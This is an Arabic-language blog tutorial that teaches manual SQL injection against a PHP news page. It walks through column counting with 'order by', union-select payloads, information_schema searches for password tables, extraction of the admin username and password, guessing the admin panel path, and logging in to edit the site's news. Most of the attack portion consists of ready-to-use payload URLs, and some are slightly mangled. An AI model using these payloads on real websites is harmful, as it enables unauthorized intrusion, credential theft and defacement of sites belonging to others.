الخميس، 19 سبتمبر 2013

الحقن اليدوي


 



السلام عليكم معكم        samirsoltani


         
تم اعادة الدرس بناء على رغبة صديقي         
هہيہثہم فہرنہسہآ
                       اعادة لشرح استغلال ثغرة SQL يدويا


samirsoltani
   ليس موقع حقيق تم وضعه للشرح فقط   
كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=2 

ح الاستغلال كدا

كود PHP:
 http://www.samirsoltani.org/news/showevent.php?id=2' 


حلو جدا انا  اعرف عدد الجداول الموجوده وش اسوي 

راح نستخدم امر 

order+by

 يكون هكذا الاستغلال

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+order+by+6-- 

كدا حلو ما ظهر لنا خطأ 

يبقي عدد 6 في الجداول موجود 


طيب الحين نزود عدد 6 الى 7 و 8 لحد ما يظهر لنا الخطأ 

طيب الحين نزود عدد ليصبح عدد الجداول 7

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+order+by+7-- 

ظهر لنا الخطأ 


وكدا نعلم ان عدد الجداول المصابه في الموقع هم 6 لان الموقع اشتغل عند هذا العدد

الحين نستخدم امر union+select لكي نظهر الجداول المصابه بالموقع

ونضع عدد الجداول الى هم + وراح يصبح الاستغلال كدا

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6-- 

يجب ان 

لا ننس ان نضع علامه - قبل الرقم المتغير الى هوه رقم 2 


حلو الحين عندنا الجدول رقم 3 ورقم 4 مصابين كما بالصوره 

الحين نشوف اصدار القاعده 

نضع امر version() في العمود المصاب 

هذا استغلال بسيط

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,version(),5,6-- 

حلو 

الحين جدا ظهر لنا الاصدار الخامس  


احسن شيئ في الاصدار الخامس ممكن تطلع اسماء الجداول من غير ما تخمن وهذي الميزه حلوه جدا

حلو الحين راح نستخدم امر الاستعلام هذا

كود PHP:
+from+information_schema.columns+WHERE+column_nam e+LIKE

امسح المسافات من كلمه نيم
بعد كلمه Like راح نضيف تشفير الى بدينا نبحث عنه داخل قواعد البينات 

وراح ارفق لكم بعض التشفيرات 

وراح نضع في العمود المصاب 

هذا الاستعلام 

concat(table_nam e,0x3e,column_nam e,0x3e,table_schema)

امسح المسافات من كلمه نيم

الحين بيصبح الاستغلال 

كدا

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,concat(table_nam e,0x3e,column_nam e,0x3e,table_schema),5,6+from+information_schema.columns+WHERE+column_nam e+LIKE+char(37, 112, 97, 115, 115, 37)-- 

امسح المسافات من كلمه نيم
طبعا التشفير الموجود بعد كلمه Like هوه لكلمه %pass%

وهذي العلامه % تعني ان ممكن يكون اسمه قبل pass او بعده 

والتشفير

كود PHP:
char(371129711511537

هوه الى راح نغيرو للبحث بأسماء 

اخري مثل %user% و %login% و %admin% تم وضع مرفقات مع الدرس

وهكذا بعد ما كتبنا الاستغلال نشوف وش النتيجه 


حلو تم استخراج البينات المطلوبه 

admin>password>nyucssamember

admin : اسم الجدول 

Password : ام العمود

الحين نروح نستخدم البينات الى احنا طلعناها علشان نجيب اسم اليوزر حقت الادمن والباسورد

رجع لاظهاء الجداول المصابه مره اخري

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,3,4,5,6-- 

الحين نستخدم امر 

+from+اسم الجدول --

وفي العمود المصاب نضع password الى استخرجناها 

والجدول طبعأ بيكون admin

يعني يصبح هكذا

كود PHP:
http://www.samirsoltani.org/news/showevent.php?id=-2+union+select+1,2,password,4,5,6+From+admin-- 

جيد

جدا الان الاتغلال ظهر لنا الباسورد الى احنا طلبناه حق الادمن 


والباسورد هوه algeria

طيب الحين نجرب نفس الاستغلال ونبدأ password بـ usernam eعلشان نطلع يوزر 

الادمن
اليوزر هو samir

طيب الحين كل شيئ تمام الان نروح للوحه الموقع وانت الى عليك تخمنها 

احيانا بتكون 

admin.php

login.php

control.php

ومسار اللوحه

كود PHP:
http://www.samirsoltani.org/news/login.php? 

الحين معنا اليوزر والباس ندخلهم

ونضغط login 

طيب حلو اكيد كل موقع واللوحه حقو تختلف عن الاخري 

الان نذهب للاخبار = news 

ونضغط Edit
ولان ندخل ونجرب على الموقع المستهذف


1 commentaires:

لا تنسى ان تشارك samir soltani بتعليقك
او نشر الموظوع جزاك الله خيرا